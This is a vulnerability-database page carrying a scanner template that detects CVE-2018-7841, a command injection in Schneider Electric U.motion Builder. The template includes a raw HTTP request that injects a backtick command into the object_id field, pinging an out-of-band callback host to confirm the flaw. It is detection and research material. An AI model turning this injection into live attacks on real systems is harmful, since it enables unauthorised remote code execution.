Vulners
Lucene search
Schneider Electric U.motion Builder - Remote Code Execution
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | Schneider Electric U.Motion Builder 1.3.4 Command Injection Vulnerability | 15 May 201900:00 | – | zdt |
 | Exploit for Cross-site Scripting in Astaro Security_Gateway_Software | 30 Apr 201915:15 | – | githubexploit |
 | CVE-2018-7841 | 22 May 201900:00 | – | attackerkb |
 | The vulnerability of the U.motion Builder system, related to the incorrect processing of special symbols in SQL queries, allows a hacker to execute arbitrary code. | 18 Jul 201900:00 | – | bdu_fstec |
 | CVE-2018-7841 | 15 May 201909:07 | – | circl |
 | Schneider Electric U.motion Builder SQL Injection Vulnerability | 15 Apr 202200:00 | – | cisa_kev |
 | Schneider Electric U.Motion Builder track_import_export.php object_id unauthenticated command injection vulnerability | 15 May 201900:00 | – | cnvd |
 | Schneider Electric U.motion SQL Injection (CVE-2018-7841) | 31 May 202000:00 | – | checkpoint_advisories |
 | CVE-2018-7841 | 22 May 201919:20 | – | cve |
 | CVE-2018-7841 | 22 May 201919:20 | – | cvelist |
10
id: CVE-2018-7841
info:
name: Schneider Electric U.motion Builder - Remote Code Execution
author: darses,rcesecurity
severity: critical
description: |
U.motion Builder 1.3.4 contains a remote code execution vulnerability caused by improper input sanitization, allowing attackers to execute arbitrary system commands through crafted input parameters.
impact: |
Attackers can execute arbitrary system commands on the server, potentially leading to complete system compromise, data theft, service disruption, or lateral movement within the network.
remediation: |
The product has been retired and is no longer available or supported. To further protect their installations from this threat, customers should immediately remove the U.motion Builder software from their systems.
reference:
- https://www.exploit-db.com/exploits/46846
- https://packetstorm.news/files/id/152862
- https://www.rcesecurity.com/2019/05/cve-2018-7841-schneider-electric-umotion-builder-remote-code-execution-0-day
- https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2017-178-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2019-071-02-Umotion-Builder.pdf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-7841
cwe-id: CWE-78
epss-score: 0.72486
epss-percentile: 0.99366
cpe: cpe:2.3:a:schneider-electric:u.motion_builder:1.3.4:*:*:*:*:*:*:*
metadata:
verified: true
max-requests: 1
vendor: schneider-electric
product: u.motion_builder
shodan-query: http.headers_hash:1985490094
tags: cve,cve2018,schneider-electric,rce,kev,oast,oob,vkev,vuln
variables:
oast: "{{interactsh-url}}"
http:
- raw:
- |
POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
op=export&language=english&interval=1&object_id=`ping -c 1 {{interactsh-url}}`
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, 'dns')
- contains(content_type, "application/octet-stream")
- status_code == 200
condition: and
# digest: 490a0046304402201639d98ebb868ea2d101c4ebbe208dfb87c6ef58d8ad950acc74b47fccce5871022018d3372de9b0b6e39260192f7ac0355a8acb75c08ac01405ffa97cfa334ecc9c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
8.1High risk
Vulners AI Score8.1
CVSS 27.5
CVSS 3.19.8
EPSS0.72486
SSVC